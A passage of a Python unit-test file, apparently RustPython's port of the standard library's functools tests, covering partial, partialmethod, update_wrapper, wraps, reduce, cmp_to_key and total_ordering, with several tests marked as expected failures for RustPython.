args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
@unittest.skipIf(sys.platform == "win32", "TODO: RUSTPYTHON, thread 'main' has overflowed its stack on Windows")
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle(self):
super().test_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_recursive_pickle(self):
super().test_recursive_pickle()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# TODO: RUSTPYTHON
def test_pickle(self):
TestPartial.test_pickle(self)
# TODO: RUSTPYTHON
def test_recursive_pickle(self):
TestPartial.test_recursive_pickle(self)
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertWarns(DeprecationWarning):
class B:
method = functools.partialmethod(func=capture, a=1)
b = B()
self.assertEqual(b.method(2, x=3), ((b, 2), {'a': 1, 'x': 3}))
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
# TODO: RUSTPYTHON
@unittest.expectedFailure
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
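# (the pure-Python cmp_to_key wrapper sets __hash__ = None, and the C
# version matches, so key objects are deliberately unhashable)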
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bad_cmp(self):
super().test_bad_cmp()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key(self):
super().test_cmp_to_key()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cmp_to_key_arguments(self):
super().test_cmp_to_key_arguments()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_hash(self):
super().test_hash()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_obj_field(self):
super().test_obj_field()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int(self):
super().test_sort_int()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_sort_int_str(self):
super().test_sort_int_str()
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestLRU:
def test_lru(self):
def orig(x, y):
return 3 * x + y
f = self.module.lru_cache(maxsize=20)(orig)
